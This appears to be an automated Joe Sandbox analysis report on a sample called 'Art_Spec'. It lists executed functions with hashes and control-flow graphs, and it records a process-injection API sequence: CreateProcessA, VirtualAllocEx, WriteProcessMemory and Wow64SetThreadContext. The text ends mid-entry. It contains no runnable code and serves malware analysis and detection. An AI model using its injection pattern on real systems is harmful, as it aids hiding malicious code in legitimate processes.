a7cf4e 26012->26013 26014 a7b780 LoadLibraryExW 26013->26014 26015 a7cf67 26013->26015 26014->26015 26015->25980 26017 a7cf2d 26016->26017 26018 a7cf67 26017->26018 26019 a7b780 LoadLibraryExW 26017->26019 26018->25980 26019->26018 26021 a7b78b 26020->26021 26023 a7dc78 26021->26023 26024 a7d084 26021->26024 26023->26023 26025 a7d08f 26024->26025 26026 a75cec LoadLibraryExW 26025->26026 26027 a7dce7 26026->26027 26027->26023 26028 a7d438 26029 a7d47e GetCurrentProcess 26028->26029 26031 a7d4d0 GetCurrentThread 26029->26031 26032 a7d4c9 26029->26032 26033 a7d506 26031->26033 26034 a7d50d GetCurrentProcess 26031->26034 26032->26031 26033->26034 26037 a7d543 26034->26037 26035 a7d56b GetCurrentThreadId 26036 a7d59c 26035->26036 26037->26035 26203 a7af98 26204 a7afe0 GetModuleHandleW 26203->26204 26205 a7afda 26203->26205 26206 a7b00d 26204->26206 26205->26204

                                                        Executed Functions

                                                        Function 053072F0 Relevance: 1.4, Strings: 1, Instructions: 135COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: T(z
                                                        • API String ID: 0-3184255237
                                                        • Opcode ID: c0f8ca23f3f9ae4972b404afadec86323bd564c287f06415cd715067c06d238a
                                                        • Instruction ID: ab92b88655d824bf29c27565018ad38935902ab73e530d9153274c29aa58e074
                                                        • Opcode Fuzzy Hash: c0f8ca23f3f9ae4972b404afadec86323bd564c287f06415cd715067c06d238a
                                                        • Instruction Fuzzy Hash: CF41B431F15305CBDB59DAA899617BEB7BBEBC4600F20A46AD506FB6C4CA309D018B52
                                                        Function 05308779 Relevance: 1.4, Strings: 1, Instructions: 122COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: T(z
                                                        • API String ID: 0-3184255237
                                                        • Opcode ID: 8a8e58ced93011b122d81668d3192ff7783ac0086ffe1f781a35c02826d5d969
                                                        • Instruction ID: e35e79f185e2f413bceef5087dee5fcc97f88e44a772bc50f18980f73ce5da20
                                                        • Opcode Fuzzy Hash: 8a8e58ced93011b122d81668d3192ff7783ac0086ffe1f781a35c02826d5d969
                                                        • Instruction Fuzzy Hash: 12410932F153058BDB19CAB988616BFF7BBEBC8600F14E42AD511FB6C5CA709D018B52
                                                        Function 05308788 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: T(z
                                                        • API String ID: 0-3184255237
                                                        • Opcode ID: 515dfdeb587e58dd99d2c20c809cb85f5dc5be5c970be4f5326052b992a0febe
                                                        • Instruction ID: ba8944455dfccf940ee5bb9d0c3b0e0d447e5289cbcc77d819b430081b577ad0
                                                        • Opcode Fuzzy Hash: 515dfdeb587e58dd99d2c20c809cb85f5dc5be5c970be4f5326052b992a0febe
                                                        • Instruction Fuzzy Hash: 7531E831F143058BDB58DAB989617BFF6BBEBC8600F10E42AD511FB6C4CA709D018B51
                                                        Function 00A74B0C Relevance: .4, Instructions: 354COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2118601252.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a70000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d2831749b1614f9a1a5e702307cde2278f05977cf6a98ae98476e0bdd0b1b030
                                                        • Instruction ID: 47fca9edcb25c155e511514364a3a611f1429f89e38f1177cece902a99b9c4e4
                                                        • Opcode Fuzzy Hash: d2831749b1614f9a1a5e702307cde2278f05977cf6a98ae98476e0bdd0b1b030
                                                        • Instruction Fuzzy Hash: B7C13C12204AD597D712593E4C366EBBFA99F8B378B1CC38DE6E85D192E322D442C315
                                                        Function 05307F18 Relevance: .1, Instructions: 120COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 782e363db8a240f38da845533d5fd3048d52c38681acee28cf653680e4dd5cc2
                                                        • Instruction ID: 5703abf15683206316fe5b63412760c1220766daf8bd1d481d62c6fb775fae4a
                                                        • Opcode Fuzzy Hash: 782e363db8a240f38da845533d5fd3048d52c38681acee28cf653680e4dd5cc2
                                                        • Instruction Fuzzy Hash: E0419735B04319DFC744CFA8C9604AEFBBBEF88250B105567E509EB690D631EE4387A1
                                                        Function 05307F28 Relevance: .1, Instructions: 113COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2131000347.0000000005300000.00000040.00000800.00020000.00000000.sdmp, Offset: 05300000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5300000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3239d9186eb3cb4aae5b6add902c9413dd9c94c4c9bd80c755b72fcc4a7ed893
                                                        • Instruction ID: b15fe5bd11f51c16df9847706e1f4c7420bfa84cd06308d5baa41998b965e4bc
                                                        • Opcode Fuzzy Hash: 3239d9186eb3cb4aae5b6add902c9413dd9c94c4c9bd80c755b72fcc4a7ed893
                                                        • Instruction Fuzzy Hash: 1B41AB35B14219DFC744DFA8C9608AEFB7BEF88350B105466E509EB790D631EE42C7A1
                                                        Function 00A7D429 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentProcess.KERNEL32 ref: 00A7D4B6
                                                        • GetCurrentThread.KERNEL32 ref: 00A7D4F3
                                                        • GetCurrentProcess.KERNEL32 ref: 00A7D530
                                                        • GetCurrentThreadId.KERNEL32 ref: 00A7D589
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2118601252.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a70000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: Current$ProcessThread
                                                        • String ID:
                                                        • API String ID: 2063062207-0
                                                        • Opcode ID: 55f3afb713dd9e3bf26c5417c330d28cdf7929ed8b55239d5f2c68abacf710bd
                                                        • Instruction ID: ed91546475a9799a0d0592e8e0492d1f8a8b022d608d4ca8013d3197d33a1dbe
                                                        • Opcode Fuzzy Hash: 55f3afb713dd9e3bf26c5417c330d28cdf7929ed8b55239d5f2c68abacf710bd
                                                        • Instruction Fuzzy Hash: 525176B0900249CFDB54CFA9D948BEEBBF1BF88304F24C559E109A7391D734A945CB66
                                                        Function 00A7D438 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentProcess.KERNEL32 ref: 00A7D4B6
                                                        • GetCurrentThread.KERNEL32 ref: 00A7D4F3
                                                        • GetCurrentProcess.KERNEL32 ref: 00A7D530
                                                        • GetCurrentThreadId.KERNEL32 ref: 00A7D589
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2118601252.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a70000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: Current$ProcessThread
                                                        • String ID:
                                                        • API String ID: 2063062207-0
                                                        • Opcode ID: 655c3d9bd9bbdbb71a63eb425380ba7f51d3f040204edea6e913a5c22e47e4d1
                                                        • Instruction ID: df7856003942a17134b68bf8d3e03984f8c5af56749785c2117b68f8837fce61
                                                        • Opcode Fuzzy Hash: 655c3d9bd9bbdbb71a63eb425380ba7f51d3f040204edea6e913a5c22e47e4d1
                                                        • Instruction Fuzzy Hash: 305165B0900609DFDB54DFAAD948BAEBBF1FF88304F24C559E109A7390D734A944CB66
                                                        Function 047C1E85 Relevance: 1.7, APIs: 1, Instructions: 249processCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 44 47c1e85-47c1e86 45 47c1e8c-47c1e8d 44->45 46 47c1e88 44->46 47 47c1e8f-47c1f04 45->47 48 47c1f09-47c1f25 45->48 46->45 47->48 50 47c1f5e-47c1f7e 48->50 51 47c1f27-47c1f31 48->51 58 47c1fb7-47c1fe6 50->58 59 47c1f80-47c1f8a 50->59 51->50 52 47c1f33-47c1f35 51->52 54 47c1f58-47c1f5b 52->54 55 47c1f37-47c1f41 52->55 54->50 56 47c1f45-47c1f54 55->56 57 47c1f43 55->57 56->56 60 47c1f56 56->60 57->56 65 47c201f-47c20d9 CreateProcessA 58->65 66 47c1fe8-47c1ff2 58->66 59->58 61 47c1f8c-47c1f8e 59->61 60->54 63 47c1f90-47c1f9a 61->63 64 47c1fb1-47c1fb4 61->64 67 47c1f9c 63->67 68 47c1f9e-47c1fad 63->68 64->58 79 47c20db-47c20e1 65->79 80 47c20e2-47c2168 65->80 66->65 69 47c1ff4-47c1ff6 66->69 67->68 68->68 70 47c1faf 68->70 71 47c1ff8-47c2002 69->71 72 47c2019-47c201c 69->72 70->64 74 47c2004 71->74 75 47c2006-47c2015 71->75 72->65 74->75 75->75 76 47c2017 75->76 76->72 79->80 90 47c2178-47c217c 80->90 91 47c216a-47c216e 80->91 93 47c218c-47c2190 90->93 94 47c217e-47c2182 90->94 91->90 92 47c2170 91->92 92->90 96 47c21a0-47c21a4 93->96 97 47c2192-47c2196 93->97 94->93 95 47c2184 94->95 95->93 99 47c21b6-47c21bd 96->99 100 47c21a6-47c21ac 96->100 97->96 98 47c2198 97->98 98->96 101 47c21bf-47c21ce 99->101 102 47c21d4 99->102 100->99 101->102 104 47c21d5 102->104 104->104
                                                        APIs
                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 047C20C6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2127238812.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_47c0000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: 38bfa9e6fbe70c5a2827ad86d3d01f8c8cd333284a9d093cb560e997dbfe8ffa
                                                        • Instruction ID: 0912df884a1312cee18e8fa917eef085316d5064ee2a8184c306c50cfd859615
                                                        • Opcode Fuzzy Hash: 38bfa9e6fbe70c5a2827ad86d3d01f8c8cd333284a9d093cb560e997dbfe8ffa
                                                        • Instruction Fuzzy Hash: 49A15871D00219DFEB14DFA8C8817ADBBB2FF48314F1485AEE808A7241DB75A985CF91
                                                        Function 047C1E90 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 105 47c1e90-47c1f25 107 47c1f5e-47c1f7e 105->107 108 47c1f27-47c1f31 105->108 115 47c1fb7-47c1fe6 107->115 116 47c1f80-47c1f8a 107->116 108->107 109 47c1f33-47c1f35 108->109 111 47c1f58-47c1f5b 109->111 112 47c1f37-47c1f41 109->112 111->107 113 47c1f45-47c1f54 112->113 114 47c1f43 112->114 113->113 117 47c1f56 113->117 114->113 122 47c201f-47c20d9 CreateProcessA 115->122 123 47c1fe8-47c1ff2 115->123 116->115 118 47c1f8c-47c1f8e 116->118 117->111 120 47c1f90-47c1f9a 118->120 121 47c1fb1-47c1fb4 118->121 124 47c1f9c 120->124 125 47c1f9e-47c1fad 120->125 121->115 136 47c20db-47c20e1 122->136 137 47c20e2-47c2168 122->137 123->122 126 47c1ff4-47c1ff6 123->126 124->125 125->125 127 47c1faf 125->127 128 47c1ff8-47c2002 126->128 129 47c2019-47c201c 126->129 127->121 131 47c2004 128->131 132 47c2006-47c2015 128->132 129->122 131->132 132->132 133 47c2017 132->133 133->129 136->137 147 47c2178-47c217c 137->147 148 47c216a-47c216e 137->148 150 47c218c-47c2190 147->150 151 47c217e-47c2182 147->151 148->147 149 47c2170 148->149 149->147 153 47c21a0-47c21a4 150->153 154 47c2192-47c2196 150->154 151->150 152 47c2184 151->152 152->150 156 47c21b6-47c21bd 153->156 157 47c21a6-47c21ac 153->157 154->153 155 47c2198 154->155 155->153 158 47c21bf-47c21ce 156->158 159 47c21d4 156->159 157->156 158->159 161 47c21d5 159->161 161->161
                                                        APIs
                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 047C20C6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2127238812.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_47c0000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: CreateProcess
                                                        • String ID:
                                                        • API String ID: 963392458-0
                                                        • Opcode ID: d63325acb33b21f169454edd9a0f32d209e192796933e679199315bd249994e7
                                                        • Instruction ID: aa81f95372bb69582d63d700544bd7a7392efdda335999748a7f87f089558321
                                                        • Opcode Fuzzy Hash: d63325acb33b21f169454edd9a0f32d209e192796933e679199315bd249994e7
                                                        • Instruction Fuzzy Hash: 99915971D00219DFEB14DFA8C8417ADBBB2FF48314F1485AEE809A7241DB75A985CF91
                                                        Function 00A744E0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 162 a744e0-a759d9 CreateActCtxA 165 a759e2-a75a3c 162->165 166 a759db-a759e1 162->166 173 a75a3e-a75a41 165->173 174 a75a4b-a75a4f 165->174 166->165 173->174 175 a75a51-a75a5d 174->175 176 a75a60 174->176 175->176 178 a75a61 176->178 178->178
                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 00A759C9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2118601252.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a70000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: 067b652dfee06e5f22c3a7648feffad936cf951d91516c8d7ba9a290bc75be8f
                                                        • Instruction ID: 5cc8e5fd3f13a0561bd6c965eb329efaa4396f365000b41420d64e9f27c37d4b
                                                        • Opcode Fuzzy Hash: 067b652dfee06e5f22c3a7648feffad936cf951d91516c8d7ba9a290bc75be8f
                                                        • Instruction Fuzzy Hash: EB41F371C0071DCBEB24CFA9C84479EBBF5BF48304F20856AD518AB251D7B56946CF90
                                                        Function 00A75913 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 179 a75913-a759d9 CreateActCtxA 181 a759e2-a75a3c 179->181 182 a759db-a759e1 179->182 189 a75a3e-a75a41 181->189 190 a75a4b-a75a4f 181->190 182->181 189->190 191 a75a51-a75a5d 190->191 192 a75a60 190->192 191->192 194 a75a61 192->194 194->194
                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 00A759C9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2118601252.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a70000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: 431b2be62eb34e9e288c5e27779ec7612eab882db852aeab0edc153d5be06d07
                                                        • Instruction ID: d3759c5c34c7a375a18385a87584f5b621476578c49275640e7c0548942433eb
                                                        • Opcode Fuzzy Hash: 431b2be62eb34e9e288c5e27779ec7612eab882db852aeab0edc153d5be06d07
                                                        • Instruction Fuzzy Hash: 6041F171C0071DCBEB24CFA9C894BDEBBB5BF88304F20856AD509AB251DBB55946CF50
                                                        Function 047C1C01 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 195 47c1c01-47c1c02 196 47c1c08-47c1c56 195->196 197 47c1c04-47c1c07 195->197 199 47c1c58-47c1c64 196->199 200 47c1c66-47c1ca5 WriteProcessMemory 196->200 197->196 199->200 202 47c1cae-47c1cde 200->202 203 47c1ca7-47c1cad 200->203 203->202
                                                        APIs
                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 047C1C98
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2127238812.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_47c0000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: 789750e00eafae1740a2164bee34fbdeb3fd4b08809a0419c635472472a77348
                                                        • Instruction ID: d841228f4cbd228ae21e57d9dbb7376f989aa173cc8bbff8fdfef351d774bc18
                                                        • Opcode Fuzzy Hash: 789750e00eafae1740a2164bee34fbdeb3fd4b08809a0419c635472472a77348
                                                        • Instruction Fuzzy Hash: EE2137B19003599FDB10DFA9C9847EEBBF5FF48310F50842EE919A7241D778A945CBA0
                                                        Function 047C1C08 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 207 47c1c08-47c1c56 209 47c1c58-47c1c64 207->209 210 47c1c66-47c1ca5 WriteProcessMemory 207->210 209->210 212 47c1cae-47c1cde 210->212 213 47c1ca7-47c1cad 210->213 213->212
                                                        APIs
                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 047C1C98
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2127238812.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_47c0000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: 8b423358cd90f37cfaa0dbd9518d9220eb5e48d0b7c56f8c37e7ac138fdddab9
                                                        • Instruction ID: 3ee1b723a207041da044bbed56f8c2686376632253a81a923375b67f87fbecb4
                                                        • Opcode Fuzzy Hash: 8b423358cd90f37cfaa0dbd9518d9220eb5e48d0b7c56f8c37e7ac138fdddab9
                                                        • Instruction Fuzzy Hash: 092126719003199FDB10DFA9C985BEEBBF5FF48310F50882EE919A7241D778A944CBA0
                                                        Function 047C1A68 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 217 47c1a68-47c1a6a 218 47c1a6c-47c1a6e 217->218 219 47c1a70-47c1a73 217->219 218->219 220 47c1a74-47c1abb 218->220 219->220 222 47c1abd-47c1ac9 220->222 223 47c1acb-47c1afb Wow64SetThreadContext 220->223 222->223 225 47c1afd-47c1b03 223->225 226 47c1b04-47c1b34 223->226 225->226
                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 047C1AEE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2127238812.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_47c0000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: 73517e5b27e2def4ec9627ee2f129c69750fec2c5aaf60786068e4a6b08f363e
                                                        • Instruction ID: 5353ff8f70c3113fd00d3a8883852660896df5ccd0a8953269d41f14529bc865
                                                        • Opcode Fuzzy Hash: 73517e5b27e2def4ec9627ee2f129c69750fec2c5aaf60786068e4a6b08f363e
                                                        • Instruction Fuzzy Hash: 5E2143719003098FDB10DFAAC885BAEBBF4EB88320F54842ED559A7341D778A945CFA1
                                                        Function 047C1CF1 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 230 47c1cf1-47c1cf2 231 47c1cf8-47c1cfb 230->231 232 47c1cf4-47c1cf6 230->232 233 47c1cfc-47c1d85 ReadProcessMemory 231->233 232->231 232->233 236 47c1d8e-47c1dbe 233->236 237 47c1d87-47c1d8d 233->237 237->236
                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 047C1D78
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2127238812.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_47c0000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        • Opcode ID: 50f314364f798e67404d7ecebc797a04a4b5793f7607b24ae0ba2f84d6c2cb4a
                                                        • Instruction ID: 9c915ae2a26f313cae1fcdcd105634547306d2b9c440e437083e4ddcd10ebfc8
                                                        • Opcode Fuzzy Hash: 50f314364f798e67404d7ecebc797a04a4b5793f7607b24ae0ba2f84d6c2cb4a
                                                        • Instruction Fuzzy Hash: 252122719002499FDB10DFAAC880AEEBBB5FF48310F54842EE919A7251C739A9059BA1
                                                        Function 00A7D678 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 241 a7d678-a7d714 DuplicateHandle 242 a7d716-a7d71c 241->242 243 a7d71d-a7d73a 241->243 242->243
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00A7D707
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2118601252.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a70000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: 8cbf8afc5876799a52a3533adbbb4c236857e1dcfaea0392a7e3d4d58abb7fc9
                                                        • Instruction ID: 3b70edfbe3f4ba0f59ec265e7727045f954e3fdfc04c2a3708c6758e288b1455
                                                        • Opcode Fuzzy Hash: 8cbf8afc5876799a52a3533adbbb4c236857e1dcfaea0392a7e3d4d58abb7fc9
                                                        • Instruction Fuzzy Hash: 672105B59002499FDB10CFA9D884AEEBFF5EF48310F24841AE918A3351D374A945CF60
                                                        Function 047C1CF8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 257 47c1cf8-47c1d85 ReadProcessMemory 261 47c1d8e-47c1dbe 257->261 262 47c1d87-47c1d8d 257->262 262->261
                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 047C1D78
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2127238812.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_47c0000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        • Opcode ID: b2a3717ba153cbcf90d41602479a3fc01bf9e725fee51340e4e68014f39e86b6
                                                        • Instruction ID: 9c34f55feff92af03b5f42662cf722b91160163eb389e2d48247af34926b7026
                                                        • Opcode Fuzzy Hash: b2a3717ba153cbcf90d41602479a3fc01bf9e725fee51340e4e68014f39e86b6
                                                        • Instruction Fuzzy Hash: 312114719003499FDB10DFAAD880AEEBBF5FF48310F54842EE519A7250D779A900CBA1
                                                        Function 047C1A70 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 246 47c1a70-47c1abb 249 47c1abd-47c1ac9 246->249 250 47c1acb-47c1afb Wow64SetThreadContext 246->250 249->250 252 47c1afd-47c1b03 250->252 253 47c1b04-47c1b34 250->253 252->253
                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 047C1AEE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2127238812.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_47c0000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: 0b7e6a47223f5640cd745550fede686974d40c507b513c3dcd9b9900631e2689
                                                        • Instruction ID: 8c00433432af6ab7bc84fb5785f50728c00fad6400107e94b0d2e734fbd014e9
                                                        • Opcode Fuzzy Hash: 0b7e6a47223f5640cd745550fede686974d40c507b513c3dcd9b9900631e2689
                                                        • Instruction Fuzzy Hash: 552134719003098FDB10DFAAC485BAEBBF4EF88320F54842ED519A7241D778A945CFA1
                                                        Function 00A7D680 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 266 a7d680-a7d714 DuplicateHandle 267 a7d716-a7d71c 266->267 268 a7d71d-a7d73a 266->268 267->268
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00A7D707
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2118601252.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a70000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: 4cf559ab94a4a5607410f3ac65fafcb1a77607c27ae9bc1c74dd34cc6bced543
                                                        • Instruction ID: e7c578118609cca31f0f7f31236a4c3a7dc18469418b6576ee5e106d9479bfdb
                                                        • Opcode Fuzzy Hash: 4cf559ab94a4a5607410f3ac65fafcb1a77607c27ae9bc1c74dd34cc6bced543
                                                        • Instruction Fuzzy Hash: 9421C4B5900249DFDB10CFAAD984ADEBBF4FB48310F14841AE918A7350D375A954CFA5
                                                        Function 047C1B40 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 271 47c1b40-47c1b42 272 47c1b48-47c1bc3 VirtualAllocEx 271->272 273 47c1b44 271->273 276 47c1bcc-47c1bf1 272->276 277 47c1bc5-47c1bcb 272->277 273->272 277->276
                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 047C1BB6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2127238812.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_47c0000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 144134e3ca09d5fd066bbd03b6b714d6451d55b187a0d7ee12bf11d6389c2919
                                                        • Instruction ID: aaa67d7861c625a160753fd5755d0f9c364937111d8bc1e269dd4010c64d542b
